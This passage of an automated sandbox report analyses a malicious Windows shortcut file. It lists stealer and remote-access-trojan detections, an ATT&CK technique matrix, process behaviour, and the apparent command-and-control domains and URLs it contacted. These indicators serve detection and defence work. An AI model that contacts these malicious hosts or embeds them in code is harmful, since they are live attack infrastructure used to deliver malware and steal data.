                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

                Stealing of Sensitive Information

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected zgRAT
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected zgRAT
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c9b50000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Command and Scripting Interpreter                		1
                Scheduled Task/Job                		12
                Process Injection                		11
                Masquerading                		OS Credential Dumping21
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Scheduled Task/Job                		41
                Virtualization/Sandbox Evasion                		LSASS Memory12
                Process Discovery                		Remote Desktop ProtocolData from Removable Media3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)1
                DLL Side-Loading                		12
                Process Injection                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials2
                System Network Configuration Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem21
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522858 Sample: BX7yRz7XqF.lnk Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 39 www.nadra.gov.pk 2->39 41 ofc.mofserviceserver.top 2->41 43 3 other IPs or domains 2->43 71 Malicious sample detected (through community Yara rule) 2->71 73 Windows shortcut file (LNK) starts blacklisted processes 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 10 other signatures 2->77 9 powershell.exe 14 32 2->9         started        13 powershell.exe 15 2->13         started        15 svchost.exe 1 2 2->15         started        signatures3 process4 dnsIp5 63 pmofficepakistancloudserver.shiftroof.top 172.67.132.65, 49702, 80 CLOUDFLARENETUS United States 9->63 79 Windows shortcut file (LNK) starts blacklisted processes 9->79 81 Uses ping.exe to check the status of other devices and networks 9->81 83 Uses nslookup.exe to query domains 9->83 17 powershell.exe 28 9->17         started        20 chrome.exe 1 9->20         started        23 PING.EXE 1 9->23         started        29 3 other processes 9->29 65 ofc.mofserviceserver.top 172.67.149.9, 443, 49714, 49715 CLOUDFLARENETUS United States 13->65 25 powershell.exe 13->25         started        27 conhost.exe 13->27         started        67 127.0.0.1 unknown unknown 15->67 signatures6 process7 dnsIp8 69 Windows shortcut file (LNK) starts blacklisted processes 17->69 31 cmd.exe 1 17->31         started        59 3 other IPs or domains 20->59 34 chrome.exe 20->34         started        49 www.nadra.gov.pk 104.22.15.154 CLOUDFLARENETUS United States 23->49 51 gateway.discord.gg 162.159.135.234, 443, 49724 CLOUDFLARENETUS United States 25->51 53 cloud.dellicon.top 188.114.97.3, 443, 49719, 49721 CLOUDFLARENETUS European Union 25->53 55 www.yahoo.com 29->55 57 www.protonmail.com 29->57 61 3 other IPs or domains 29->61 signatures9 process10 dnsIp11 85 Uses schtasks.exe or at.exe to add and modify task schedules 31->85 37 schtasks.exe 1 31->37         started        45 pmo.gov.pk 203.101.184.118, 443, 49706, 49707 CYBERNET-APCyberInternetServicesPvtLtdPK Pakistan 34->45 47 www.google.com 142.250.186.36, 443, 49712, 49727 GOOGLEUS United States 34->47 signatures12 process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BX7yRz7XqF.lnk42%ReversingLabsShortcut.Trojan.WinLnk
                BX7yRz7XqF.lnk100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ofc.mofserviceserver.top
                		172.67.149.9
                		truetrue
                  		unknown
                  me-ycpi-cf-www.g06.yahoodns.net
                  		87.248.119.251
                  		truefalse
                    		unknown
                    www.google.com
                    		142.250.186.36
                    		truefalse
                      		unknown
                      gateway.discord.gg
                      		162.159.135.234
                      		truefalse
                        		unknown
                        www.protonmail.com
                        		185.70.42.31
                        		truetrue
                          		unknown
                          pmofficepakistancloudserver.shiftroof.top
                          		172.67.132.65
                          		truefalse
                            		unknown
                            pmo.gov.pk
                            		203.101.184.118
                            		truetrue
                              		unknown
                              www.nadra.gov.pk
                              		104.22.15.154
                              		truetrue
                                		unknown
                                cloud.dellicon.top
                                		188.114.97.3
                                		truefalse
                                  		unknown
                                  www.yahoo.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    1.1.1.1.in-addr.arpa
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://pmo.gov.pk/site/404true
                                        		unknown
                                        https://gateway.discord.gg/?v=9&encording=jsonfalse
                                          		unknown
                                          http://pmofficepakistancloudserver.shiftroof.top//WinSysMgr/false
                                            		unknown
                                            https://pmo.gov.pk/favicon.icofalse
                                              		unknown
                                              https://cloud.dellicon.top/1000/500/false
                                                		unknown
                                                https://ofc.mofserviceserver.top/DSCTSC/false
                                                  		unknown
                                                  http://cloud.dellicon.top/1000/500/false
                                                    		unknown
                                                    http://ofc.mofserviceserver.top/DSCTSC/true
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://pmo.gov.pk/site/404;Wpowershell.exe, 00000000.00000002.3889819595.00000205712B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://ofc.mofserviceserver.tpowershell.exe, 0000000A.00000002.1446930048.000002480162F000.00000004.00000800.00020000.00000000.sdmptrue
                                                          		unknown
                                                          http://pmofficepakistancloudserver.shiftroof.top//WinSysMgr/thepowershell.exe, 00000000.00000002.3806263511.0000020500E0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.microsoft.copowershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://pmo.gov.pk/site/404;powershell.exe, 00000000.00000002.3889819595.0000020571230000.00000004.00000020.00020000.00000000.sdmp, BX7yRz7XqF.lnktrue
                                                                		unknown
                                                                http://gateway.discord.ggpowershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://pmo.gov.pk/site/404Tpowershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://discord.com/api/v9/guilds/powershell.exe, 0000000F.00000002.1601062674.000001D1B1776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.microsoft.coCpowershell.exe, 0000000F.00000002.1671863168.000001D1C9630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://pmofficepakistancloudserver.shi$id/winsysmgr/powershell.exe, 00000000.00000002.3898543575.0000020573560000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://contoso.com/powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.3879782353.0000020510072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3879782353.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.00000248002E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.0000024810092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024801D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.00000248101C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B2DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://gateway.discord.gg:443/?v=9&encording=jsonpowershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://oneget.orgXpowershell.exe, 0000000A.00000002.1446930048.00000248019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://pmofficepakistancloudserver.shi$id/WinSysMgr/powershell.exe, 00000000.00000002.3889819595.0000020571230000.00000004.00000020.00020000.00000000.sdmp, BX7yRz7XqF.lnktrue
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.3806263511.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B10B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://pmo.gov.pk/site/404;mpowershell.exe, 00000000.00000002.3889819595.00000205712B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.3879782353.0000020510072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3879782353.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3806263511.0000020501A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.00000248003DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.0000024810092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.00000248101C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000A.00000002.1446930048.00000248019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1601062674.000001D1B2C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1601062674.000001D1B2C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://go.micropowershell.exe, 00000000.00000002.3806263511.00000205014EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024800F42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B1C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://cloud.dellicon.toppowershell.exe, 0000000F.00000002.1601062674.000001D1B151A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://pmo.gov.pk/site/404;$id=powershell.exe, 00000000.00000002.3893130672.0000020572D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3895148907.0000020573340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3892359354.0000020571380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3889819595.0000020571237000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3889819595.00000205712B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://ofc.mofserviceserver.top/DSCTpowershell.exe, 00000000.00000002.3806263511.0000020501980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.000002480162F000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          		unknown
                                                                                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000008.00000003.1412694467.000002384C670000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                                                                                            		unknown
                                                                                            http://crl.ver)svchost.exe, 00000008.00000002.3809924179.000002384C800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.microsoft.powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://discord.com/api/v9/channels/powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1601062674.000001D1B2C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://pmo.gov.pk/site/404&powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://g.live.com/odclientsettings/Prod1C:edb.log.8.drfalse
                                                                                                        		unknown
                                                                                                        http://cloud.dellicon.toppowershell.exe, 0000000F.00000002.1601062674.000001D1B137C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://file.io/powershell.exe, 0000000F.00000002.1601062674.000001D1B1776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://pmofficepakistancloudserver.shipowershell.exe, 00000000.00000002.3806263511.0000020500234000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                              		unknown
                                                                                                              http://pmofficepakistancloudserver.shiftroof.toppowershell.exe, 00000000.00000002.3806263511.000002050195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3806263511.00000205014EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.3806263511.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B10B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://ipwho.is/powershell.exe, 0000000F.00000002.1601062674.000001D1B1776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://gateway.discord.ggpowershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://oneget.orgpowershell.exe, 0000000A.00000002.1446930048.00000248019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://pmo.gov.pk/site/404R_F_PROpowershell.exe, 00000000.00000002.3895148907.0000020573340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      142.250.186.36
                                                                                                                      		www.google.comUnited States
                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                      104.22.15.154
                                                                                                                      		www.nadra.gov.pkUnited States
                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                      172.67.132.65
                                                                                                                      		pmofficepakistancloudserver.shiftroof.topUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      203.101.184.118
                                                                                                                      		pmo.gov.pkPakistan
                                                                                                                      		9541CYBERNET-APCyberInternetServicesPvtLtdPKtrue
                                                                                                                      162.159.135.234
                                                                                                                      		gateway.discord.ggUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      172.67.149.9
                                                                                                                      		ofc.mofserviceserver.topUnited States
                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                      239.255.255.250
                                                                                                                      		unknownReserved
                                                                                                                      		unknownunknownfalse
                                                                                                                      188.114.97.3
                                                                                                                      		cloud.dellicon.topEuropean Union
                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      192.168.2.7
                                                                                                                      192.168.2.4
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1522858
                                                                                                                      Start date and time:2024-09-30 18:57:12 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 8m 41s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:BX7yRz7XqF.lnk
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877.lnk
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.evad.winLNK@34/25@22/11
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 50%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .lnk
                                                                                                                      • Override analysis time to 240s for powershell

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.186.46, 66.102.1.84, 34.104.35.123, 23.43.61.160, 184.28.90.27, 84.201.210.37, 142.250.185.131, 142.250.185.174
                                                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5140 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: BX7yRz7XqF.lnk

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      12:58:22API Interceptor177x Sleep call for process: powershell.exe modified
